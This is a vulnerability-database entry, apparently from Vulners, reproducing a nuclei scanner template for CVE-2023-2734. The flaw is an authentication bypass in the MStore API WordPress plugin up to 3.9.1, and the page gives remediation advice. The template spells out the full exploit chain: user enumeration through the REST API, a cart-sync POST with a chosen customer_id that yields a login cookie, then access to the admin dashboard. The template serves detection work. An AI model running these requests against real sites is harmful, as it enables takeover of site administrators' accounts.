Lucene search
K

MStore API <= 3.9.1 - Authentication Bypass

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

MStore API WordPress up to 3.9.1 allows unauthenticated login as any user via cart sync; upgrade to 3.9.2.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-2734
25 May 202303:15
attackerkb
Circl
CVE-2023-2734
30 Nov 202513:09
circl
CNNVD
WordPress Plugin MStore API 安全漏洞
25 May 202300:00
cnnvd
CVE
CVE-2023-2734
25 May 202302:05
cve
Cvelist
CVE-2023-2734 MStore API <= 3.9.1 - Authentication Bypass
25 May 202302:05
cvelist
EUVD
EUVD-2023-34195
3 Oct 202520:07
euvd
NVD
CVE-2023-2734
25 May 202303:15
nvd
OSV
CVE-2023-2734
25 May 202303:15
osv
Patchstack
WordPress MStore API Plugin <= 3.9.1 is vulnerable to Broken Authentication
25 May 202300:00
patchstack
Prion
Authentication flaw
25 May 202303:15
prion
Rows per page
id: CVE-2023-2734

info:
  name: MStore API <= 3.9.1 - Authentication Bypass
  author: daffainfo
  severity: critical
  description: |
    The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.1. This is due to insufficient verification on the user being supplied during the cart sync from mobile REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.
  impact: |
    Attackers can log in as any user, including administrators, potentially gaining full control over the site.
  remediation: |
    Update to version 3.9.2 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mstore-api/mstore-api-391-authentication-bypass
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2915729%40mstore-api&old=2913397%40mstore-api&sfp_email=&sfph_mail=#file59
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2734
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 9.8
    cve-id: CVE-2023-2734
    epss-score: 0.03805
    epss-percentile: 0.88727
    cwe-id: CWE-200
    cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: inspireui
    product: mstore_api
    framework: wordpress
    fofa-query: body="/wp-content/plugins/mstore-api/"
    publicwww-query: "/wp-content/plugins/mstore-api/"
  tags: cve,cve2023,wordpress,wp,wp-plugin,inspireui,mstore_api,auth-bypass,vkev

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{route}}"

    attack: clusterbomb
    payloads:
      route:
        - "wp-json/wp/v2/users"
        - "?rest_route=/wp/v2/users"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "[{\"id", "name\":")'
        condition: and
        internal: true

    extractors:
      - type: json
        name: user_id
        json:
          - '.[0].id'
        internal: true

  - raw:
      - |
        POST /wp-json/api/flutter_woo/cart HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"customer_id":{{user_id}}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200 || status_code == 500'
          - 'contains(content_type, "application/json")'
          - 'contains(header, "wordpress_logged_in_")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/index.php HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Dashboard","Plugins","Edit Profile")'
        condition: and
# digest: 4b0a00483046022100b3c7620c9a925b397d3c627425e220e955e08bad8fc9908682b9620cdf89c166022100defd2e1f86f91934a90be605fff4fe6364656cc63d064422960a2965cf319c3a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
EPSS0.03805
SSVC
16